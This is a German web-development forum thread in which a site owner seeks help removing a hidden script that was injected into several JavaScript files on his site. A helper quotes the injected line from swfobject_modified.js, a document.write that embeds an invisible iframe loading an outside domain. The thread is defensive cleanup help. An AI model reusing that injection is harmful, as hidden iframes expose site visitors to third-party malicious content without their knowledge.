Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > Web Development
You last visited: Today at 23:07

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Hilfe bei versteckten PHP script

Discussion on Hilfe bei versteckten PHP script within the Web Development forum part of the Coders Den category.

Reply
 
Old   #1
 
elite*gold: 6
Join Date: Jun 2011
Posts: 578
Received Thanks: 76
Hilfe bei versteckten PHP script

Hi
Ich suche hilfe undzwar mache ich eine seite und da hat sich ein script reingesetzt was ich nicht weg bekomme es ist in keiner seite angezeigt nur bei der hauptkonsole ist es drinne hir ist ein bild von dem was sich eingenistet hat

Hoffe jemand kann mir helfen :|
Lg
Xtream+
xtream+ is offline  
Old 11/16/2012, 16:29   #2
 
epiTR's Avatar
 
elite*gold: 185
Join Date: May 2008
Posts: 3,646
Received Thanks: 603
Entferne einfach das IFrame.
epiTR is offline  
Old 11/16/2012, 16:37   #3
 
elite*gold: 6
Join Date: Jun 2011
Posts: 578
Received Thanks: 76
Quote:
Originally Posted by epiTR View Post
Entferne einfach das IFrame.
ha ha, wenn ich das gedunden hätte, dann wäre es schon weg. :-)
Das schissding versteckt sich irgendwo.
xtream+ is offline  
Old 11/16/2012, 16:44   #4

 
boxxiebabee's Avatar
 
elite*gold: 0
Join Date: May 2008
Posts: 1,222
Received Thanks: 500
edit:

In der Datei swfobject_modified.js ganz unten:

Code:
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.lemmel.net/about.php"></iframe></div>');
boxxiebabee is offline  
Old 11/16/2012, 17:09   #5
 
elite*gold: 6
Join Date: Jun 2011
Posts: 578
Received Thanks: 76
Danke hat gefunzt,
da hab ich noch ne frage:
hat da jemand die js Scripte versaut?
Das Problem ist jetzt noch auf anderen Seiten ohne den flashplayer.
Mein alter ist am Fluchen wie ein Rohrspatz.
So, habe nun 7 Scripte gefungen, die geändert wurde.
Da macht sich einer nen Spass :-(
Danke an boxxiebabee für den richtigen Wink
Wie kann ich denn das verhindern?
xtream+ is offline  
Reply


Similar Threads Similar Threads
Pixelsearch bei minimierten/versteckten Fenstern nutzen
11/29/2011 - AutoIt - 5 Replies
Hallo, ich will mithilfe von Pixelsearch einen Button anklicken,der in einem minimierten oder verstecktem Internet Explorer ist. So soll es ablaufen: 1. Bot startet (weiß ich) 2. Button wird geklickt,Befehle werden ausgeführt (weiß ich) 3. Pixelsearch startet und sucht im minimiertem oder verstecktem Fenster den Pixel und klickt auf ihn. (weiß ich nicht) wie kann ich das machen?
Wie erstelle ich deine Windows 7 DVD aus der versteckten Partition?
07/22/2011 - Technical Support - 5 Replies
Hallo , ich habe jetz grad nicht so die Pc kenntnisse und so :P Daher erklär ich mal was ich meine. Ich hatte mir mal vor paar wochen nen Acer Notebook gekauft. dort war Win 7 HP 64 bit vorinstalliert , aber keine windows cd dabei. Nun hab ich mir ne Win 7 ultimate Gamer Edition runtergeladen gebrannt und installiert. Klappt super , nur ich möchte jetz wieder auf das Vorinstallierte Win 7 HP wechseln. Weil ich tastenfunktionen mit dem Gamer betreibsystem nciht machen kann(zb tv etc)....
NPC`s und Mats auf den versteckten Inseln ?
02/12/2011 - World of Warcraft - 5 Replies
Hallo zusammen, habe da von nem Kumpel gehört das es auf einer der versteckten Inseln auch NPC`s geben soll von denen man Mats und Armor etc. abkaufen kann? GM Island Developpers Island Designer Island Wer weiß ob es so etwas auf einem "Live Server" für "normale" Player gibt ? Hat da viel. jemand Live Server Erfahrung? :) Gruß Riopan
Hallo Mitarbeiter Playmt2 Mitglied Page! Hide Muco gesagt, Sie versteckten sich! Ich
01/29/2010 - Metin2 Private Server - 3 Replies
TÜRKISCH PLAYMT2 Private Server .. Mitgliedschaftsspeicher Sizden IFORUMTURK der linken Seite. MITARBEITER PLAYMT2 MITGLIEDSCHAFT PlayM52 Hallo .. Ein türkischer Private Playmt2 Ihrem Server! Durch die Mitgliedschaft des Servers, auf Muco53 gegründet Haben Sie trat Dige Saved!
[Suche] Wege zu ein paar versteckten Plätzen
07/18/2006 - World of Warcraft - 12 Replies
Hallo epvpler, ich suche die Wege zu 4 Plätzen hier die Screenshots: Klick 1 Klick 2 klick 3 Klick 4 für jede Lösung gibts nen Karma up. Danke im vorraus -Frozen =)



All times are GMT +2. The time now is 23:07.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.